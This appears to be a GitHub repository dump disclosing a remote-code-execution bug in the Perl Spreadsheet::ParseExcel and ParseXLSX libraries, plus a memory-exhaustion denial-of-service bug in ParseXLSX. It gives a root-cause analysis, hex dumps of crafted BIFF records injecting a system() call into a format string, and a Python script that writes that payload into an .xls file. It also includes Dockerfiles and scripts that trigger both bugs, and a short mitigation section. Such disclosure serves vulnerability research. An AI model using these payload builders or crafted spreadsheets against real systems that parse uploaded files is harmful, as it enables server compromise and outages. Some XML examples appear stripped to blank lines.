├── ParseXLSX_0days.pptx ├── README.md ├── parse_xlsx_bomb.md └── poc ├── .gitignore ├── README.md ├── bomb ├── Dockerfile ├── ahihi.pl └── ahihi.xlsx ├── rce ├── Dockerfile ├── run.sh ├── test-xls.pl ├── test.pl ├── test.xls └── test.xlsx └── xls-payload.py /ParseXLSX_0days.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/haile01/perl_spreadsheet_excel_rce_poc/1c747faa046b3e66ec73a62779ba1f410d0a6fa1/ParseXLSX_0days.pptx -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ParseExcel security vulnerabilitiy 2 | 3 | > TL;DR: RCE from logic in parsing format strings. 4 | 5 | ## Short explanation on the exploit 6 | 7 | Root cause of the exploitation comes from calling `eval` to an unvalidated user input in `Utility.pm` 8 | 9 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/Utility.pm#L171 10 | ```perl 11 | # Uitlity.pm 12 | sub ExcelFmt { 13 | my ( $format_str, $number, $is_1904, $number_type, $want_subformats ) = @_; 14 | 15 | return $number unless $number =~ $qrNUMBER; 16 | 17 | my $conditional; 18 | if ( $format_str =~ /^\[([<>=][^\]]+)\](.*)$/ ) { 19 | $conditional = $1; 20 | $format_str = $2; 21 | } 22 | 23 | #... 24 | 25 | if ($conditional) { 26 | # TODO. Replace string eval with a function. 27 | $section = eval "$number $conditional" ? 0 : 1; 28 | } 29 | #... 30 | } 31 | ``` 32 | 33 | According to what I inspected, current implementation for this flow lacks proper validation, while using `eval` for handling comparison logics is too "over kill" in this case. Because of this, both `ParseExcel::parse` and `ParseXLSX::parse` (used for reading data from Excel files) are vulnearble to RCE. 34 | 35 | ### Where's `$format_str`? 36 | `ValFmt` is the most possible caller of `ExcelFmt`, so I'll explain further into this method 37 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L141-L161 38 | ```perl 39 | sub ValFmt { 40 | my ( $oThis, $oCell, $oBook ) = @_; 41 | 42 | my ( $Dt, $iFmtIdx, $iNumeric, $Flg1904 ); 43 | 44 | if ( $oCell->{Type} eq 'Text' ) { 45 | $Dt = 46 | ( ( defined $oCell->{Val} ) && ( $oCell->{Val} ne '' ) ) 47 | ? $oThis->TextFmt( $oCell->{Val}, $oCell->{Code} ) # Perform some encoding logic => doesn't cause RCE 48 | : ''; 49 | 50 | return $Dt; 51 | } 52 | else { 53 | $Dt = $oCell->{Val}; 54 | $Flg1904 = $oBook->{Flg1904}; 55 | my $sFmtStr = $oThis->FmtString( $oCell, $oBook ); 56 | 57 | # where RCE lies => $oCell->{Type} must be either "Date" or "Number" 58 | return ExcelFmt( $sFmtStr, $Dt, $Flg1904, $oCell->{Type} ); 59 | } 60 | } 61 | ``` 62 | If `$oCell->{Type}` is `Date` or `Number`, `ExcelFmt` will be called. 63 | 64 | The value `$format_str` is the returned from another method: `FmtString` 65 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L101-L136 66 | ```perl 67 | sub FmtString { 68 | my ( $oThis, $oCell, $oBook ) = @_; 69 | 70 | my $sFmtStr = 71 | $oThis->FmtStringDef( $oBook->{Format}[ $oCell->{FormatNo} ]->{FmtIdx}, 72 | $oBook ); # maps to the correct format string 73 | 74 | #... 75 | 76 | unless ( defined($sFmtStr) ) { 77 | # assigns default format string depending on the value, can ignore 78 | #... 79 | } 80 | return $sFmtStr; 81 | } 82 | ``` 83 | Another function is being called, so we'll examine `FmtStringDef` as well 84 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L87-L96 85 | ```perl 86 | sub FmtStringDef { 87 | my ( $oThis, $iFmtIdx, $oBook, $rhFmt ) = @_; 88 | my $sFmtStr = $oBook->{FormatStr}->{$iFmtIdx}; # does the mapping 89 | 90 | # More with assigning default format string, can ignore 91 | #... 92 | } 93 | ``` 94 | 95 | All variables are clear, we can conclude the attack vector as follows: 96 | - Inject the malicious format string with index `$iFmtIdx` 97 | - Make sure a cell format `$oBook->{Format}[$cellFmtIdx]` maps to `$iFmtIdx` 98 | - Make sure a cell maps to that cell format (`$oCell->{FormatNo} = $cellFmtIdx`) 99 | ![[flow 1.png]] 100 | 101 | In the sections below, I'll go over detailed explanation of how the payload propagated the shell code to `eval` command. There will be 2 sections for parsing .xls file using `ParseExcel` and parsing .xlsx file using `ParseXLSX`. 102 | 103 | ## PoC 104 | To demonstrate, below is the link to our crafted malicious Excel files (in .xls and .xlsx) that runs `whoami` and stores result to `/tmp/inject.txt` file. 105 | https://gist.github.com/haile01/0f4f19e4441895ef33ff27385080478b 106 | 107 | ### Exploitation on XLS file 108 | Take a simple Perl program to parse xls file like below, which uses `ParseExcel::parse`. RCE will happen while the parsing is performed, even before any data is fetched. 109 | 110 | ```perl 111 | use strict; 112 | use Spreadsheet::ParseExcel; 113 | 114 | my $parser = Spreadsheet::ParseExcel->new(); 115 | # file.xls is malicious file from end user 116 | my $workbook = $parser->parse("test.xls"); 117 | ``` 118 | 119 | #### Injecting format string 120 | Excel 97 binary files is structured in to chunks of binary data called BIFF record. Each record starts with a header called `opCode` (in little-endian), then the length of the record and it's actual data. 121 | 122 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L438 123 | ```perl 124 | sub QueryNext { 125 | my ( $q ) = @_; 126 | 127 | 128 | if ( $q->{streamPos} + 4 >= $q->{streamLen} ) { 129 | return 0; 130 | } 131 | 132 | my $data = substr( $q->{stream}, $q->{streamPos}, 4 ); 133 | 134 | ( $q->{opcode}, $q->{length} ) = unpack( 'v2', $data ); 135 | 136 | # No biff record should be larger than around 20,000. 137 | if ( $q->{length} >= 20000 ) { 138 | return 0; 139 | } 140 | 141 | if ( $q->{length} > 0 ) { 142 | $q->{data} = substr( $q->{stream}, $q->{streamPos} + 4, $q->{length} ); 143 | } 144 | else { 145 | $q->{data} = undef; 146 | $q->{dont_decrypt_next_record} = 1; 147 | } 148 | 149 | if ( $q->{encryption} == MS_BIFF_CRYPTO_RC4 ) { 150 | # Handles with decryption 151 | } 152 | elsif ( $q->{encryption} == MS_BIFF_CRYPTO_XOR ) { 153 | # not implemented 154 | return 0; 155 | } 156 | elsif ( $q->{encryption} == MS_BIFF_CRYPTO_NONE ) { 157 | 158 | } 159 | 160 | $q->{streamPos} += 4 + $q->{length}; 161 | 162 | return 1; 163 | } 164 | ``` 165 | 166 | After that, a corresponding handler for record type is used to extract that BIFF record data. 167 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L576-L580 168 | 169 | ```perl 170 | if ( defined $self->{FuncTbl}->{$record} && !$workbook->{_skip_chart} ) 171 | { 172 | $self->{FuncTbl}->{$record} 173 | ->( $workbook, $record, $record_length, $record_header ); 174 | } 175 | ``` 176 | 177 | Format string is handled by `_subFormat`, with `opCode = 0x41E` 178 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L1563-L1585 179 | ```perl 180 | sub _subFormat { 181 | 182 | my ( $oBook, $bOp, $bLen, $sWk ) = @_; 183 | my $sFmt; 184 | 185 | if ( $oBook->{BIFFVersion} <= verBIFF5 ) { 186 | $sFmt = substr( $sWk, 3, unpack( 'c', substr( $sWk, 2, 1 ) ) ); 187 | $sFmt = $oBook->{FmtClass}->TextFmt( $sFmt, '_native_' ); 188 | } 189 | else { 190 | $sFmt = _convBIFF8String( $oBook, substr( $sWk, 2 ) ); 191 | } 192 | 193 | my $format_index = unpack( 'v', substr( $sWk, 0, 2 ) ); 194 | 195 | # Excel 4 and earlier used an index of 0 to indicate that a built-in format 196 | # that was stored implicitly. 197 | if ( $oBook->{BIFFVersion} <= verBIFF4 && $format_index == 0 ) { 198 | $format_index = keys %{ $oBook->{FormatStr} }; 199 | } 200 | 201 | $oBook->{FormatStr}->{$format_index} = $sFmt; 202 | } 203 | ``` 204 | 205 | I wasn't sure which BIFF version being used in my .xls file but according to the data in the binary file, it should match with the `else` case (> `verBIFF5`). 206 | 207 | Structure of format string record in newer BIFF versions should be 208 | **1E 04 \[record length - 2 bytes\] \[format string index - 2 bytes\] \[format string length - 1 byte\] \[string flags - 2 bytes\] \[format string content\]** 209 | 210 | By following the correct structure, I can inject any format string into the .xls file. 211 | 212 | The actual BIFF record for format string I injected in the PoC (format string index is `\x00\xa5`) 213 | ``` 214 | 00000000: 1e04 3100 a500 2c00 005b 3e31 3233 3b73 ..1...,..[>123;s 215 | ^^^^ 216 | format string index 217 | 00000010: 7973 7465 6d28 2777 686f 616d 6920 3e20 ystem('whoami > 218 | 00000020: 2f74 6d70 2f69 6e6a 6563 742e 7478 7427 /tmp/inject.txt' 219 | 00000030: 295d 3132 33 )]123 220 | ``` 221 | 222 | #### Mapping a cell format to the format string 223 | Cell formats will define many properties for a cell, such as format string, styling, fonts, ... One cell format can link to one format string by including format string's index inside their BIFF record. This logic is handled by `_subXf` 224 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L1441-L1558 225 | 226 | ```perl 227 | sub _subXF { 228 | my ( $oBook, $bOp, $bLen, $sWk ) = @_; 229 | 230 | #... 231 | 232 | if ( $oBook->{BIFFVersion} == verBIFF4 ) { 233 | #... 234 | } 235 | elsif ( $oBook->{BIFFVersion} == verBIFF8 ) { 236 | my ( $iGen, $iAlign, $iGen2, $iBdr1, $iBdr2, $iBdr3, $iPtn ); 237 | 238 | ( $iFnt, $iIdx, $iGen, $iAlign, $iGen2, $iBdr1, $iBdr2, $iBdr3, $iPtn ) 239 | = unpack( "v7Vv", $sWk ); 240 | #... 241 | } 242 | else { 243 | ( $iFnt, $iIdx, $iGen, $iAlign, $iPtn, $iPtn2, $iBdr1, $iBdr2 ) = 244 | unpack( "v8", $sWk ); 245 | #... 246 | } 247 | 248 | push @{ $oBook->{Format} }, Spreadsheet::ParseExcel::Format->new( 249 | FontNo => $iFnt, 250 | Font => $oBook->{Font}[$iFnt], 251 | FmtIdx => $iIdx, # <- the index that points to format string index 252 | #... 253 | ); 254 | } 255 | ``` 256 | Because our `BIFFVersion` is greater than BIFF5, the condition shouldn't fall into the first case. For the other two, we know that `$iIdx` is the second word in BIFF data. That's why it's trivial to perform this step also. 257 | 258 | The actual BIFF record for cell format I used in the PoC 259 | ``` 260 | 00000000: e000 1400 0000 a500 f5ff 2000 0000 0000 .......... ..... 261 | ^^^^ 262 | format string index 263 | 00000010: 0000 0000 0000 c020 ....... 264 | ``` 265 | More over, cell formats are identified by its index in a list, so I modified the first record, then my cell format index should be `0` 266 | 267 | #### Mapping a cell to the cell format 268 | For a cell to apply a format, it should include the ID of the cell format inside the cell's BIFF record. However, as I mentioned before, only cell with type `Number` or `Date` can trigger the RCE, so I'll use a cell with date type for the PoC (refered as RK BIFF record). 269 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/19ea68d2ebf640e06df4f6937fcb43d76a5ec96b/lib/Spreadsheet/ParseExcel.pm#L918-L939 270 | 271 | ```perl 272 | sub _subRK { 273 | my ( $workbook, $biff_number, $length, $data ) = @_; 274 | my ( $row, $col, $format_index, $rk_number ) = unpack( 'vvvV', $data ); 275 | my $number = _decode_rk_number( $rk_number ); 276 | 277 | _NewCell( 278 | $workbook, $row, $col, 279 | Kind => 'RK', 280 | Val => $number, 281 | FormatNo => $format_index, 282 | Format => $workbook->{Format}->[$format_index], 283 | Numeric => 1, 284 | Code => undef, 285 | Book => $workbook, 286 | ); 287 | #... 288 | } 289 | ``` 290 | We can see that the index that maps to a cell format is now the third word of the record, so all we need to do is null-out this word into `\x00` 291 | 292 | The actual BIFF record for date cell I used in the PoC 293 | ``` 294 | 00000000: 7e02 0a00 0000 0000 0000 201a e240 ~......... ..@ 295 | ^^^^ 296 | format index 297 | ``` 298 | 299 | Note that the method `_subRK` haven't explicitly define the type `Date` yet. Type checking is implemented in `chkType` instead 300 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel/FmtDefault.pm#L166-L181 301 | 302 | ```perl 303 | sub ChkType { 304 | my ( $oPkg, $iNumeric, $iFmtIdx ) = @_; 305 | if ($iNumeric) { 306 | if ( ( ( $iFmtIdx >= 0x0E ) && ( $iFmtIdx <= 0x16 ) ) 307 | || ( ( $iFmtIdx >= 0x2D ) && ( $iFmtIdx <= 0x2F ) ) ) 308 | { 309 | return "Date"; 310 | } 311 | else { 312 | return "Numeric"; 313 | } 314 | } 315 | else { 316 | return "Text"; 317 | } 318 | } 319 | ``` 320 | Since `$iNumeric` is set to `1`, we are sure that type is not `Text` 321 | 322 | Finally, when initializing a new `Cell` object, `ValFmt` will be called and continue with the execution chain, propagate our shell to `eval` method. 323 | https://github.com/jmcnamara/spreadsheet-parseexcel/blob/e33d626d9b9cec91be7520dec1686712313957fb/lib/Spreadsheet/ParseExcel.pm#L2375-L2433 324 | 325 | ### Exploitation on XLSX file 326 | Working with .xlsx file is quite easier, since we can directly modify the data in plaintext (xml format). 327 | Take a simple Perl program to parse xls file like below, which uses `ParseXLSX::parse`. RCE will happen while the parsing is performed, even before any data is fetched. 328 | 329 | ```perl 330 | use strict; 331 | use Spreadsheet::ParseExcel; 332 | use Spreadsheet::ParseXLSX; 333 | 334 | my $parser = Spreadsheet::ParseXLSX->new(); 335 | # file.xlsx is malicious file from end user 336 | my $workbook = $parser->parse("test.xlsx"); 337 | ``` 338 | XLSX file is a zip file that compresses many xml files, each containing specific types of data of the workbook. 339 | Below is the example of folder structure: 340 | ``` 341 | |- [Content_Types].xml 342 | |- _rels 343 | |- docProps 344 | |- app.xml 345 | |- core.xml 346 | |- xl 347 | |- _rels 348 | |- workbook.xml.rels 349 | |- styles.xml <--- Format strings & cell formats 350 | |- workbook.xml 351 | |- sharedStrings.xml 352 | |- theme 353 | |- theme1.xml 354 | |- worksheets 355 | |- sheet1.xml <--- Cell values 356 | ``` 357 | 358 | #### Injecting format string & mapping to a cell format 359 | Format string is included in `xl/styles.xml` file, under `` tag, while cell formats are defined under `` tag. 360 | https://github.com/doy/spreadsheet-parsexlsx/blob/80198923186bedda61d4dceb0272210dc8bec533/lib/Spreadsheet/ParseXLSX.pm#L630-L923 361 | 362 | ```perl 363 | sub _parse_styles { 364 | # ... 365 | my %format_str = ( 366 | %default_format_str, 367 | (map { 368 | $_->att('numFmtId') => $_->att('formatCode') 369 | } $styles->find_nodes('//s:numFmts/s:numFmt')), 370 | ); 371 | # ... 372 | my @format = map { 373 | my %opts = ( 374 | %default_format_opts, 375 | %ignore, 376 | ); 377 | # ... 378 | $opts{FmtIdx} = 0+($xml_fmt->att('numFmtId')||0); 379 | # ... 380 | Spreadsheet::ParseExcel::Format->new(%opts) 381 | } $styles->find_nodes('//s:cellXfs/s:xf'); 382 | # ... 383 | 384 | 385 | return { 386 | FormatStr => \%format_str, 387 | Font => \@font, 388 | Format => \@format, 389 | } 390 | } 391 | ``` 392 | 393 | To inject a format string, we need to add a `` tag, with `formatCode` being the format string, and `numFmtId` being any integer value we want. Here I used `123`. 394 | 395 | After that, we'll add one more `` cell to map to the format string, where `numFmtId` attribute being our chosen id (`123`) 396 | 397 | The final xml data I used in the PoC 398 | ```xml 399 | 400 | 401 | 402 | ... 403 | 404 | 405 | 406 | 407 | ... 408 | 409 | 410 | 411 | 412 | 413 | 414 | 415 | 416 | 417 | ... 418 | 419 | ``` 420 | 421 | #### Mapping a cell to the cell format 422 | https://github.com/doy/spreadsheet-parsexlsx/blob/80198923186bedda61d4dceb0272210dc8bec533/lib/Spreadsheet/ParseXLSX.pm#L205-L487 423 | ```perl 424 | sub _parse_sheet { 425 | my $sheet_xml = $self->_new_twig( 426 | twig_roots => { 427 | #... 428 | 's:sheetData/s:row' => sub { 429 | my ( $twig, $row_elt ) = @_; 430 | for my $cell ( $row_elt->children('s:c') ){ 431 | my $type = $cell->att('t') || 'n'; 432 | my $val = $val_xml ? $val_xml->text : undef; 433 | 434 | #... 435 | elsif ($type eq 'n') { 436 | $long_type = 'Numeric'; 437 | $val = defined($val) ? 0+$val : undef; 438 | } 439 | elsif ($type eq 'd') { 440 | $long_type = 'Date'; 441 | } 442 | # other $type results into $long_type = 'Text' 443 | #... 444 | 445 | my $format_idx = $cell->att('s') || 0; 446 | my $format = $sheet->{_Book}{Format}[$format_idx]; 447 | die "unknown format $format_idx" unless $format; 448 | 449 | my $cell = Spreadsheet::ParseExcel::Cell->new( 450 | Val => $val, 451 | Type => $long_type, 452 | Merged => undef, # fix up later 453 | Format => $format, 454 | FormatNo => $format_idx, 455 | ($formula 456 | ? (Formula => $formula->text) 457 | : ()), 458 | Rich => $Rich, 459 | ); 460 | $cell->{_Value} = $sheet->{_Book}{FmtClass}->ValFmt( 461 | $cell, $sheet->{_Book} 462 | ); 463 | } 464 | } 465 | } 466 | ) 467 | } 468 | ``` 469 | Logic for reading cell data in this library is more straightforward, only assign the type & value directly from xml tag attributes. Since we need `$oCell->{Type}` to be `Date` or `Numeric`, we just need attribute `t` to be `d` or `n`. To map the cell to the cell format, we'll also set attribute `s` to be the index of the cell format (`3`). 470 | 471 | The final xml data I used in the PoC 472 | ```xml 473 | 474 | 475 | 476 | ... 477 | 478 | 479 | 480 | 0 481 | 482 | 483 | 484 | 485 | ... 486 | 487 | ` 488 | -------------------------------------------------------------------------------- /parse_xlsx_bomb.md: -------------------------------------------------------------------------------- 1 | # ParseXLSX security vulnerbilities 2 | 3 | > TL;DR: memory utilization go brrrr 4 | 5 | ## DoS via out-of-memory bugs 6 | 7 | ### Analysis 8 | 9 | ParseXLSX also handles with merged cells, but the memoize implementation allows attacker to allocate an arbitrary memory size. 10 | 11 | ```perl 12 | # ParseXLSX.pm 13 | sub _parse_sheet { 14 | my $sheet_xml = $self->_new_twig( 15 | twig_roots => { 16 | #... 17 | 's:mergeCells/s:mergeCell' => sub { 18 | my ( $twig, $merge_area ) = @_; 19 | 20 | if (my $ref = $merge_area->att('ref')) { 21 | my ($topleft, $bottomright) = $ref =~ /([^:]+):([^:]+)/; 22 | 23 | # Parse cell coordinates to numeric 24 | my ($toprow, $leftcol) = $self->_cell_to_row_col($topleft); 25 | my ($bottomrow, $rightcol) = $self->_cell_to_row_col($bottomright); 26 | 27 | push @{ $sheet->{MergedArea} }, [ 28 | $toprow, $leftcol, 29 | $bottomrow, $rightcol, 30 | ]; 31 | 32 | # Saves merged state for each cell in the merged cell 33 | for my $row ($toprow .. $bottomrow) { 34 | for my $col ($leftcol .. $rightcol) { 35 | $merged_cells{"$row;$col"} = 1; 36 | } 37 | } 38 | } 39 | 40 | $twig->purge; 41 | }, 42 | } 43 | ) 44 | } 45 | 46 | sub _cell_to_row_col { 47 | my $self = shift; 48 | my ($cell) = @_; 49 | 50 | my ($col, $row) = $cell =~ /([A-Z]+)([0-9]+)/; 51 | 52 | my $ncol = 0; 53 | for my $char (split //, $col) { 54 | $ncol *= 26; 55 | $ncol += ord($char) - ord('A') + 1; 56 | } 57 | $ncol = $ncol - 1; 58 | 59 | my $nrow = $row - 1; 60 | 61 | return ($nrow, $ncol); 62 | } 63 | ``` 64 | 65 | Because the size of a merged cell doesn't have any constraints, this can make the program allocates huge amount of memory, exhausts swap memory and crashes the server. 66 | 67 | ### Final POC 68 | In `xl/worksheets/sheet1.xml`, add 69 | ```xml 70 | 71 | 72 | 73 | ``` 74 | inside `` tag, or modify `ref` attribute of any existing `` tag. 75 | 76 | This would make the program allocates at least $26^3 . 10^4 \approx 4.5 . 10^9$ bytes just for handling merged cells. 77 | 78 | ### Mitigation 79 | I think that this vulnerability can be fixed in either 2 ways: 80 | - Set a limit in range inside `_cell_to_row_col` subroutine 81 | - Use a different method to handle merged cells, instead of preemptively marking like the current solution. 82 | -------------------------------------------------------------------------------- /poc/.gitignore: -------------------------------------------------------------------------------- 1 | tmp/ 2 | .DS_STORE 3 | .vscode/ 4 | -------------------------------------------------------------------------------- /poc/README.md: -------------------------------------------------------------------------------- 1 | ## POC for ParseExcel and ParseXLSX vulnerabilities 2 | ### Memory corruption 3 | Build and run docker image in `/bomb` folder, using this command 4 | 5 | `docker build -t perl-xlsx-bomb . && docker run --name perl-xlsx-bomb -m 4g -d perl-xlsx-bomb` 6 | 7 | `4g` to limit memory size for docker container. 8 | It will keep filling memory, swap memory and finally terminates for out of resource 9 | 10 | ### RCE 11 | Build and run docker image in `/rce`, using this command 12 | 13 | `docker build -t parseexcel-rce . && docker run parseexcel-rce` 14 | 15 | Notice that RCE will result in `root` being written in `/tmp/inject.txt` after each perl run 16 | 17 | #### .xls exploit 18 | Because the data is binary, it's quite hard to modify them manually. So I wrote a small script `xls-payload.py` to do that. 19 | Also, there are a lot of flag checks and integrity ensurance stuffs on xls branch, I chose not to dig into all of that. And now I have zero idea what it does. So the overall idea of the script is to manually add a custom format on Excel app as a placeholder, which matches the length of the desired payload. Then the script overwrites that placeholder, do some format mapping stuffs. And vòila. 20 | 21 | Here are the steps: 22 | 1. Run `xls-payload.py`, copy the placeholder (plz also copy the quotation marks on both ends) 23 | 2. Create `test.xls` file in the same folder (make sure to use Excel app on Windows, not sure why but Excel on MacOS or OpenOffice or Libre Office chips away some flags that we need). Input a number on a cell. Go to `Format Cell` > `Custom` and paste the placeholder. Now that cell should show a bunch of `a`s 24 | 3. Enter on the script once more. The xls file is now corrupted (make sure you won't open the file again on Excel app, or the payload will be gone). Then `mv test.xls rce/` and start a docker container to verify. 25 | -------------------------------------------------------------------------------- /poc/bomb/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM perl:5.32 2 | 3 | COPY ahihi.xlsx /app/ahihi.xlsx 4 | COPY ahihi.pl /app/ahihi.pl 5 | WORKDIR /app 6 | RUN cpanm Spreadsheet::ParseXLSX 7 | 8 | CMD ["perl", "ahihi.pl"] 9 | -------------------------------------------------------------------------------- /poc/bomb/ahihi.pl: -------------------------------------------------------------------------------- 1 | use Spreadsheet::ParseXLSX; 2 | use Spreadsheet::ParseExcel; 3 | use open qw( :std :encoding(UTF-8) ); 4 | 5 | my $t = time(); 6 | my $parser = Spreadsheet::ParseXLSX->new(); 7 | my $workbook = $parser->parse("ahihi.xlsx") or die $parser->error; 8 | 9 | $t = time() - $t; 10 | print "Parsing took $t secs"; 11 | -------------------------------------------------------------------------------- /poc/bomb/ahihi.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/haile01/perl_spreadsheet_excel_rce_poc/1c747faa046b3e66ec73a62779ba1f410d0a6fa1/poc/bomb/ahihi.xlsx -------------------------------------------------------------------------------- /poc/rce/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM perl:5.32 2 | 3 | COPY . /app 4 | WORKDIR /app 5 | RUN cpanm Spreadsheet::ParseExcel@0.65 6 | RUN cpanm Spreadsheet::ParseXLSX@0.27 7 | 8 | CMD bash run.sh 9 | -------------------------------------------------------------------------------- /poc/rce/run.sh: -------------------------------------------------------------------------------- 1 | echo "=== POC for ParseXLSX ===" 2 | rm /tmp/inject.txt 3 | perl test.pl 4 | cat /tmp/inject.txt 5 | 6 | echo "=== POC for ParseExcel ===" 7 | rm /tmp/inject.txt 8 | perl test-xls.pl 9 | cat /tmp/inject.txt 10 | -------------------------------------------------------------------------------- /poc/rce/test-xls.pl: -------------------------------------------------------------------------------- 1 | use Spreadsheet::ParseExcel; 2 | use open qw( :std :encoding(UTF-8) ); 3 | 4 | my $parser = Spreadsheet::ParseExcel->new(); 5 | my $workbook = $parser->parse("test.xls") or die $parser->error; 6 | -------------------------------------------------------------------------------- /poc/rce/test.pl: -------------------------------------------------------------------------------- 1 | use Spreadsheet::ParseXLSX; 2 | use Spreadsheet::ParseExcel; 3 | use open qw( :std :encoding(UTF-8) ); 4 | 5 | my $parser = Spreadsheet::ParseXLSX->new(); 6 | my $workbook = $parser->parse("test.xlsx") or die $parser->error; 7 | -------------------------------------------------------------------------------- /poc/rce/test.xls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/haile01/perl_spreadsheet_excel_rce_poc/1c747faa046b3e66ec73a62779ba1f410d0a6fa1/poc/rce/test.xls -------------------------------------------------------------------------------- /poc/rce/test.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/haile01/perl_spreadsheet_excel_rce_poc/1c747faa046b3e66ec73a62779ba1f410d0a6fa1/poc/rce/test.xlsx -------------------------------------------------------------------------------- /poc/xls-payload.py: -------------------------------------------------------------------------------- 1 | # Inject shell to format string 2 | shell = "system('whoami > /tmp/inject.txt')" 3 | fmtStr = f'[>123;{shell}]123' 4 | pattern = f'"{"a" * (len(fmtStr) - 2)}"' 5 | print(pattern) 6 | input() 7 | 8 | xls = open('test.xls', 'rb').read() 9 | 10 | l = xls.index(pattern.encode()) 11 | assert l != -1 #Pattern must exist 12 | r = l + len(pattern) 13 | 14 | fmtIdx = xls[l - 5:l - 3] 15 | payload_len = len(fmtStr) 16 | 17 | xls = xls[:l] + fmtStr.encode() + xls[r:] 18 | 19 | # Apply format string to xf 20 | XF_opcode_w_len = b'\xe0\x00\x14\x00' # Assume highest BIFF version 21 | l = xls.index(XF_opcode_w_len) # First means format index = 0 22 | assert l != -1 # XF must exist 23 | xls = xls[:l + 6] + fmtIdx + xls[l + 8:] 24 | 25 | # Apply format to cell 26 | RK_opcode = b'\x7e\x02' 27 | l = xls.index(RK_opcode) 28 | assert l != -1 # Date must exist 29 | l += 8 30 | 31 | xls = xls[:l] + b'\x00\x00' + xls[l + 2:] # format index 0 32 | 33 | open('test.xls', 'wb').write(xls) 34 | --------------------------------------------------------------------------------